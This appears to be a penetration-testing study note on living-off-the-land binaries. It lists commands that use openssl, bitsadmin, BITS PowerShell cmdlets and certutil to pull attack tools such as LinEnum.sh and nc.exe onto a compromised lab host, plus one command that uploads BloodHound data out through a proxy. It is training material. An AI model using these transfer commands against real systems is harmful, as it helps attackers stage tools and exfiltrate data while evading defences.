LOLBins

Aka Living off the land binaries, which are binaries that an attacker can use to perform actions beyond their original purpose.

Two websites on this:

• LOLBAS Project for Windows Binaries (here)
• GTFOBins for Linux Binaries (here)

They can be used to perform actions like:

• Download
• Upload
• Command Execution
• File Read
• File Write
• Bypasses

GTFOBins §

We can search for the download and upload function using +file download and +file upload:

We can use openssl. We first need to create a certificate and start a server.

Create Certificate in Pwnbox §

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Stand up the Server in our Pwnbox §

openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

Now to download the file from the compromised machine.

Download File from the Compromised Machine §

openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Other Lol Tools §

Bitsadmin Download function §

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares.

File download with bitsadmin §

PS bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Download §

Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"

Upload §

Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override-ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql

Certutil §

A defacto to wget. The Antimalware Scan Interface (AMSI) detects this as malicious Certutil usage:

cerutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe